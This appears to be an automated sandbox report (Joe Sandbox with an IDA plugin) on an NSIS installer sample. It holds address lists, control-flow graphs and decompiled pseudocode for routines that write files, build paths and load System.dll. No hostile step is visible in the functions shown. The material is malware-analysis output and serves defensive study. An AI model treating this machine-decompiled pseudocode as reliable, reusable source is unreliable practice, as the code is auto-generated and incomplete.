                                                                                                                          0x004068ec
                                                                                                                          0x004068ec
                                                                                                                          0x00000000
                                                                                                                          0x00406700
                                                                                                                          0x00406705
                                                                                                                          0x0040671a
                                                                                                                          0x0040671b
                                                                                                                          0x00406721
                                                                                                                          0x004068b3
                                                                                                                          0x004068c1
                                                                                                                          0x004068c4
                                                                                                                          0x004068c4
                                                                                                                          0x004068b5
                                                                                                                          0x004068b8
                                                                                                                          0x004068bb
                                                                                                                          0x004068bd
                                                                                                                          0x004068bd
                                                                                                                          0x004068c6
                                                                                                                          0x004068c6
                                                                                                                          0x004068cc
                                                                                                                          0x004068cf
                                                                                                                          0x00406702
                                                                                                                          0x00000000
                                                                                                                          0x00406702
                                                                                                                          0x00000000
                                                                                                                          0x004068cf
                                                                                                                          0x00406727
                                                                                                                          0x0040672a
                                                                                                                          0x00406739
                                                                                                                          0x00406740
                                                                                                                          0x0040674c
                                                                                                                          0x0040674f
                                                                                                                          0x00406752
                                                                                                                          0x00406753
                                                                                                                          0x00406758
                                                                                                                          0x0040675e
                                                                                                                          0x00406761
                                                                                                                          0x00406764
                                                                                                                          0x00406857
                                                                                                                          0x0040685c
                                                                                                                          0x0040688f
                                                                                                                          0x00406894
                                                                                                                          0x00406899
                                                                                                                          0x0040689e
                                                                                                                          0x0040689e
                                                                                                                          0x004068a3
                                                                                                                          0x004068a9
                                                                                                                          0x004068ac
                                                                                                                          0x00000000
                                                                                                                          0x004068ac
                                                                                                                          0x0040685e
                                                                                                                          0x00406861
                                                                                                                          0x00406864
                                                                                                                          0x00406879
                                                                                                                          0x00406880
                                                                                                                          0x00406866
                                                                                                                          0x0040686d
                                                                                                                          0x0040686d
                                                                                                                          0x00406888
                                                                                                                          0x0040688b
                                                                                                                          0x0040684f
                                                                                                                          0x00406850
                                                                                                                          0x00406850
                                                                                                                          0x00000000
                                                                                                                          0x0040688b
                                                                                                                          0x00406771
                                                                                                                          0x00406775
                                                                                                                          0x00406775
                                                                                                                          0x00406776
                                                                                                                          0x00406778
                                                                                                                          0x004067b5
                                                                                                                          0x004067b8
                                                                                                                          0x004067c8
                                                                                                                          0x004067cb
                                                                                                                          0x004067d3
                                                                                                                          0x004067d9
                                                                                                                          0x004067d9
                                                                                                                          0x00406834
                                                                                                                          0x00406834
                                                                                                                          0x00406836
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067dd
                                                                                                                          0x004067e2
                                                                                                                          0x004067e3
                                                                                                                          0x004067e5
                                                                                                                          0x004067fc
                                                                                                                          0x0040680a
                                                                                                                          0x00406810
                                                                                                                          0x00406812
                                                                                                                          0x00406830
                                                                                                                          0x00406830
                                                                                                                          0x00406830
                                                                                                                          0x00000000
                                                                                                                          0x00406830
                                                                                                                          0x00406818
                                                                                                                          0x00406821
                                                                                                                          0x00406824
                                                                                                                          0x0040682a
                                                                                                                          0x0040682e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040682e
                                                                                                                          0x004067f6
                                                                                                                          0x004067f8
                                                                                                                          0x004067fa
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067fa
                                                                                                                          0x00000000
                                                                                                                          0x00406834
                                                                                                                          0x004067c0
                                                                                                                          0x00000000
                                                                                                                          0x0040677a
                                                                                                                          0x00406798
                                                                                                                          0x004067a1
                                                                                                                          0x0040683e
                                                                                                                          0x00406842
                                                                                                                          0x0040684a
                                                                                                                          0x0040684a
                                                                                                                          0x00000000
                                                                                                                          0x00406842
                                                                                                                          0x004067ab
                                                                                                                          0x00406838
                                                                                                                          0x0040683c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040683c
                                                                                                                          0x00406778
                                                                                                                          0x00000000
                                                                                                                          0x00406705

                                                                                                                          APIs
                                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067C0
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,00000000,00000000,00000000,00000000), ref: 004067D3
                                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                                          • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,00000000), ref: 004068A4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                          • API String ID: 4260037668-1412263784
                                                                                                                          • Opcode ID: a56a8a4d956183f5ceef7ff9e42496adb417aa599aaeb911d527621cdebcfcc9
                                                                                                                          • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                                                                                          • Opcode Fuzzy Hash: a56a8a4d956183f5ceef7ff9e42496adb417aa599aaeb911d527621cdebcfcc9
                                                                                                                          • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 570 40176f-401794 call 402da6 call 405fae 575 401796-40179c call 406668 570->575 576 40179e-4017b0 call 406668 call 405f37 lstrcatW 570->576 581 4017b5-4017b6 call 4068ef 575->581 576->581 585 4017bb-4017bf 581->585 586 4017c1-4017cb call 40699e 585->586 587 4017f2-4017f5 585->587 594 4017dd-4017ef 586->594 595 4017cd-4017db CompareFileTime 586->595 588 4017f7-4017f8 call 406133 587->588 589 4017fd-401819 call 406158 587->589 588->589 597 40181b-40181e 589->597 598 40188d-4018b6 call 4056ca call 403371 589->598 594->587 595->594 599 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 597->599 600 40186f-401879 call 4056ca 597->600 610 4018b8-4018bc 598->610 611 4018be-4018ca SetFileTime 598->611 599->585 632 401864-401865 599->632 612 401882-401888 600->612 610->611 614 4018d0-4018db CloseHandle 610->614 611->614 615 402c33 612->615 617 4018e1-4018e4 614->617 618 402c2a-402c2d 614->618 619 402c35-402c39 615->619 622 4018e6-4018f7 call 4066a5 lstrcatW 617->622 623 4018f9-4018fc call 4066a5 617->623 618->615 629 401901-4023a2 call 405cc8 622->629 623->629 629->619 632->612 634 401867-401868 632->634 634->600
                                                                                                                          C-Code - Quality: 77%
                                                                                                                          			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                                                                          				void* __esi;
                                                                                                                          				void* _t35;
                                                                                                                          				void* _t43;
                                                                                                                          				void* _t45;
                                                                                                                          				FILETIME* _t51;
                                                                                                                          				FILETIME* _t64;
                                                                                                                          				void* _t66;
                                                                                                                          				signed int _t72;
                                                                                                                          				FILETIME* _t73;
                                                                                                                          				FILETIME* _t77;
                                                                                                                          				signed int _t79;
                                                                                                                          				WCHAR* _t81;
                                                                                                                          				void* _t83;
                                                                                                                          				void* _t84;
                                                                                                                          				void* _t86;
                                                                                                                          
                                                                                                                          				_t77 = __ebx;
                                                                                                                          				 *(_t86 - 8) = E00402DA6(0x31);
                                                                                                                          				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                                                                                          				_t35 = E00405FAE( *(_t86 - 8));
                                                                                                                          				_push( *(_t86 - 8));
                                                                                                                          				_t81 = L"Call";
                                                                                                                          				if(_t35 == 0) {
                                                                                                                          					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Psychopharmacology")), ??);
                                                                                                                          				} else {
                                                                                                                          					E00406668();
                                                                                                                          				}
                                                                                                                          				E004068EF(_t81);
                                                                                                                          				while(1) {
                                                                                                                          					__eflags =  *(_t86 + 8) - 3;
                                                                                                                          					if( *(_t86 + 8) >= 3) {
                                                                                                                          						_t66 = E0040699E(_t81);
                                                                                                                          						_t79 = 0;
                                                                                                                          						__eflags = _t66 - _t77;
                                                                                                                          						if(_t66 != _t77) {
                                                                                                                          							_t73 = _t66 + 0x14;
                                                                                                                          							__eflags = _t73;
                                                                                                                          							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                                                                                          						}
                                                                                                                          						asm("sbb eax, eax");
                                                                                                                          						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                                                                          						__eflags = _t72;
                                                                                                                          						 *(_t86 + 8) = _t72;
                                                                                                                          					}
                                                                                                                          					__eflags =  *(_t86 + 8) - _t77;
                                                                                                                          					if( *(_t86 + 8) == _t77) {
                                                                                                                          						E00406133(_t81);
                                                                                                                          					}
                                                                                                                          					__eflags =  *(_t86 + 8) - 1;
                                                                                                                          					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                                                                          					__eflags = _t43 - 0xffffffff;
                                                                                                                          					 *(_t86 - 0x38) = _t43;
                                                                                                                          					if(_t43 != 0xffffffff) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					__eflags =  *(_t86 + 8) - _t77;
                                                                                                                          					if( *(_t86 + 8) != _t77) {
                                                                                                                          						E004056CA(0xffffffe2,  *(_t86 - 8));
                                                                                                                          						__eflags =  *(_t86 + 8) - 2;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                                                                          						}
                                                                                                                          						L31:
                                                                                                                          						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                                                                                                                          						__eflags =  *0x42a2e8;
                                                                                                                          						goto L32;
                                                                                                                          					} else {
                                                                                                                          						E00406668("C:\Users\Arthur\AppData\Local\Temp\nsxD40A.tmp", _t83);
                                                                                                                          						E00406668(_t83, _t81);
                                                                                                                          						E004066A5(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsxD40A.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                                                                                                          						E00406668(_t83, "C:\Users\Arthur\AppData\Local\Temp\nsxD40A.tmp");
                                                                                                                          						_t64 = E00405CC8("C:\Users\Arthur\AppData\Local\Temp\nsxD40A.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                                                                                                          						__eflags = _t64;
                                                                                                                          						if(_t64 == 0) {
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							__eflags = _t64 == 1;
                                                                                                                          							if(_t64 == 1) {
                                                                                                                          								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                                                                                                                          								L32:
                                                                                                                          								_t51 = 0;
                                                                                                                          								__eflags = 0;
                                                                                                                          							} else {
                                                                                                                          								_push(_t81);
                                                                                                                          								_push(0xfffffffa);
                                                                                                                          								E004056CA();
                                                                                                                          								L29:
                                                                                                                          								_t51 = 0x7fffffff;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					L33:
                                                                                                                          					return _t51;
                                                                                                                          				}
                                                                                                                          				E004056CA(0xffffffea,  *(_t86 - 8)); // executed
                                                                                                                          				 *0x42a314 =  *0x42a314 + 1;
                                                                                                                          				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                                                                                          				 *0x42a314 =  *0x42a314 - 1;
                                                                                                                          				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                                                                                          				_t84 = _t45;
                                                                                                                          				if( *(_t86 - 0x24) != 0xffffffff) {
                                                                                                                          					L22:
                                                                                                                          					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                                                                                          				} else {
                                                                                                                          					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                                                                                          					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                                                                                          						goto L22;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				CloseHandle( *(_t86 - 0x38)); // executed
                                                                                                                          				__eflags = _t84 - _t77;
                                                                                                                          				if(_t84 >= _t77) {
                                                                                                                          					goto L31;
                                                                                                                          				} else {
                                                                                                                          					__eflags = _t84 - 0xfffffffe;
                                                                                                                          					if(_t84 != 0xfffffffe) {
                                                                                                                          						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
                                                                                                                          					} else {
                                                                                                                          						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                                                                                          						lstrcatW(_t81,  *(_t86 - 8));
                                                                                                                          					}
                                                                                                                          					_push(0x200010);
                                                                                                                          					_push(_t81);
                                                                                                                          					E00405CC8();
                                                                                                                          					goto L29;
                                                                                                                          				}
                                                                                                                          				goto L33;
                                                                                                                          			}


















                                                                                                                          0x0040176f
                                                                                                                          0x00401776
                                                                                                                          0x00401782
                                                                                                                          0x00401785
                                                                                                                          0x0040178a
                                                                                                                          0x0040178d
                                                                                                                          0x00401794
                                                                                                                          0x004017b0
                                                                                                                          0x00401796
                                                                                                                          0x00401797
                                                                                                                          0x00401797
                                                                                                                          0x004017b6
                                                                                                                          0x004017bb
                                                                                                                          0x004017bb
                                                                                                                          0x004017bf
                                                                                                                          0x004017c2
                                                                                                                          0x004017c7
                                                                                                                          0x004017c9
                                                                                                                          0x004017cb
                                                                                                                          0x004017d0
                                                                                                                          0x004017d0
                                                                                                                          0x004017db
                                                                                                                          0x004017db
                                                                                                                          0x004017ec
                                                                                                                          0x004017ee
                                                                                                                          0x004017ee
                                                                                                                          0x004017ef
                                                                                                                          0x004017ef
                                                                                                                          0x004017f2
                                                                                                                          0x004017f5
                                                                                                                          0x004017f8
                                                                                                                          0x004017f8
                                                                                                                          0x004017ff
                                                                                                                          0x0040180e
                                                                                                                          0x00401813
                                                                                                                          0x00401816
                                                                                                                          0x00401819
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040181b
                                                                                                                          0x0040181e
                                                                                                                          0x00401874
                                                                                                                          0x00401879
                                                                                                                          0x004015b6
                                                                                                                          0x0040292e
                                                                                                                          0x0040292e
                                                                                                                          0x00402c2a
                                                                                                                          0x00402c2d
                                                                                                                          0x00402c2d
                                                                                                                          0x00000000
                                                                                                                          0x00401820
                                                                                                                          0x00401826
                                                                                                                          0x0040182d
                                                                                                                          0x0040183a
                                                                                                                          0x00401845
                                                                                                                          0x0040185b
                                                                                                                          0x0040185b
                                                                                                                          0x0040185e
                                                                                                                          0x00000000
                                                                                                                          0x00401864
                                                                                                                          0x00401864
                                                                                                                          0x00401865
                                                                                                                          0x00401882
                                                                                                                          0x00402c33
                                                                                                                          0x00402c33
                                                                                                                          0x00402c33
                                                                                                                          0x00401867
                                                                                                                          0x00401867
                                                                                                                          0x00401868
                                                                                                                          0x00401493
                                                                                                                          0x0040239d
                                                                                                                          0x0040239d
                                                                                                                          0x0040239d
                                                                                                                          0x00401865
                                                                                                                          0x0040185e
                                                                                                                          0x00402c35
                                                                                                                          0x00402c39
                                                                                                                          0x00402c39
                                                                                                                          0x00401892
                                                                                                                          0x00401897
                                                                                                                          0x004018a5
                                                                                                                          0x004018aa
                                                                                                                          0x004018b0
                                                                                                                          0x004018b4
                                                                                                                          0x004018b6
                                                                                                                          0x004018be
                                                                                                                          0x004018ca
                                                                                                                          0x004018b8
                                                                                                                          0x004018b8
                                                                                                                          0x004018bc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004018bc
                                                                                                                          0x004018d3
                                                                                                                          0x004018d9
                                                                                                                          0x004018db
                                                                                                                          0x00000000
                                                                                                                          0x004018e1
                                                                                                                          0x004018e1
                                                                                                                          0x004018e4
                                                                                                                          0x004018fc
                                                                                                                          0x004018e6
                                                                                                                          0x004018e9
                                                                                                                          0x004018f2
                                                                                                                          0x004018f2
                                                                                                                          0x00401901
                                                                                                                          0x00401906
                                                                                                                          0x00402398
                                                                                                                          0x00000000
                                                                                                                          0x00402398
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Psychopharmacology,?,?,00000031), ref: 004017D5
                                                                                                                            • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                            • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,004030A8), ref: 00405725
                                                                                                                            • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll), ref: 00405737
                                                                                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Psychopharmacology$C:\Users\user\AppData\Local\Temp\nsxD40A.tmp$C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll$Call
                                                                                                                          • API String ID: 1941528284-2517933196
                                                                                                                          • Opcode ID: ae146eaacdef0e831c8dd449aef3ef234919e16d41b91f58e4b486bba6a2989e
                                                                                                                          • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                                                                                          • Opcode Fuzzy Hash: ae146eaacdef0e831c8dd449aef3ef234919e16d41b91f58e4b486bba6a2989e
                                                                                                                          • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 636 4056ca-4056df 637 4056e5-4056f6 636->637 638 405796-40579a 636->638 639 405701-40570d lstrlenW 637->639 640 4056f8-4056fc call 4066a5 637->640 642 40572a-40572e 639->642 643 40570f-40571f lstrlenW 639->643 640->639 644 405730-405737 SetWindowTextW 642->644 645 40573d-405741 642->645 643->638 646 405721-405725 lstrcatW 643->646 644->645 647 405743-405785 SendMessageW * 3 645->647 648 405787-405789 645->648 646->642 647->648 648->638 649 40578b-40578e 648->649 649->638
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004056CA(signed int _a4, WCHAR* _a8) {
                                                                                                                          				struct HWND__* _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				WCHAR* _v32;
                                                                                                                          				long _v44;
                                                                                                                          				int _v48;
                                                                                                                          				void* _v52;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				WCHAR* _t27;
                                                                                                                          				signed int _t28;
                                                                                                                          				long _t29;
                                                                                                                          				signed int _t37;
                                                                                                                          				signed int _t38;
                                                                                                                          
                                                                                                                          				_t27 =  *0x429244;
                                                                                                                          				_v8 = _t27;
                                                                                                                          				if(_t27 != 0) {
                                                                                                                          					_t37 =  *0x42a314;
                                                                                                                          					_v12 = _t37;
                                                                                                                          					_t38 = _t37 & 0x00000001;
                                                                                                                          					if(_t38 == 0) {
                                                                                                                          						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
                                                                                                                          					}
                                                                                                                          					_t27 = lstrlenW(0x422728);
                                                                                                                          					_a4 = _t27;
                                                                                                                          					if(_a8 == 0) {
                                                                                                                          						L6:
                                                                                                                          						if((_v12 & 0x00000004) == 0) {
                                                                                                                          							_t27 = SetWindowTextW( *0x429228, 0x422728); // executed
                                                                                                                          						}
                                                                                                                          						if((_v12 & 0x00000002) == 0) {
                                                                                                                          							_v32 = 0x422728;
                                                                                                                          							_v52 = 1;
                                                                                                                          							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                                                                                          							_v44 = 0;
                                                                                                                          							_v48 = _t29 - _t38;
                                                                                                                          							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                                                                                          							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                                                                                          						}
                                                                                                                          						if(_t38 != 0) {
                                                                                                                          							_t28 = _a4;
                                                                                                                          							0x422728[_t28] = 0;
                                                                                                                          							return _t28;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						_t27 = lstrlenW(_a8) + _a4;
                                                                                                                          						if(_t27 < 0x1000) {
                                                                                                                          							_t27 = lstrcatW(0x422728, _a8);
                                                                                                                          							goto L6;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t27;
                                                                                                                          			}

















                                                                                                                          0x004056d0
                                                                                                                          0x004056da
                                                                                                                          0x004056df
                                                                                                                          0x004056e5
                                                                                                                          0x004056f0
                                                                                                                          0x004056f3
                                                                                                                          0x004056f6
                                                                                                                          0x004056fc
                                                                                                                          0x004056fc
                                                                                                                          0x00405702
                                                                                                                          0x0040570a
                                                                                                                          0x0040570d
                                                                                                                          0x0040572a
                                                                                                                          0x0040572e
                                                                                                                          0x00405737
                                                                                                                          0x00405737
                                                                                                                          0x00405741
                                                                                                                          0x0040574a
                                                                                                                          0x00405756
                                                                                                                          0x0040575d
                                                                                                                          0x00405761
                                                                                                                          0x00405764
                                                                                                                          0x00405777
                                                                                                                          0x00405785
                                                                                                                          0x00405785
                                                                                                                          0x00405789
                                                                                                                          0x0040578b
                                                                                                                          0x0040578e
                                                                                                                          0x00000000
                                                                                                                          0x0040578e
                                                                                                                          0x0040570f
                                                                                                                          0x00405717
                                                                                                                          0x0040571f
                                                                                                                          0x00405725
                                                                                                                          0x00000000
                                                                                                                          0x00405725
                                                                                                                          0x0040571f
                                                                                                                          0x0040570d
                                                                                                                          0x0040579a

                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                          • lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                          • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,004030A8), ref: 00405725
                                                                                                                          • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll), ref: 00405737
                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                            • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                                            • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,00000000), ref: 004068A4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll
                                                                                                                          • API String ID: 1495540970-17409983
                                                                                                                          • Opcode ID: da0887550f177a20a5adca650a80eb3065253b4758cf57a6ba66e38fd01475e6
                                                                                                                          • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                                                                                          • Opcode Fuzzy Hash: da0887550f177a20a5adca650a80eb3065253b4758cf57a6ba66e38fd01475e6
                                                                                                                          • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 650 4069c5-4069e5 GetSystemDirectoryW 651 4069e7 650->651 652 4069e9-4069eb 650->652 651->652 653 4069fc-4069fe 652->653 654 4069ed-4069f6 652->654 656 4069ff-406a32 wsprintfW LoadLibraryExW 653->656 654->653 655 4069f8-4069fa 654->655 655->656
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004069C5(intOrPtr _a4) {
                                                                                                                          				short _v576;
                                                                                                                          				signed int _t13;
                                                                                                                          				struct HINSTANCE__* _t17;
                                                                                                                          				signed int _t19;
                                                                                                                          				void* _t24;
                                                                                                                          
                                                                                                                          				_t13 = GetSystemDirectoryW( &_v576, 0x104);
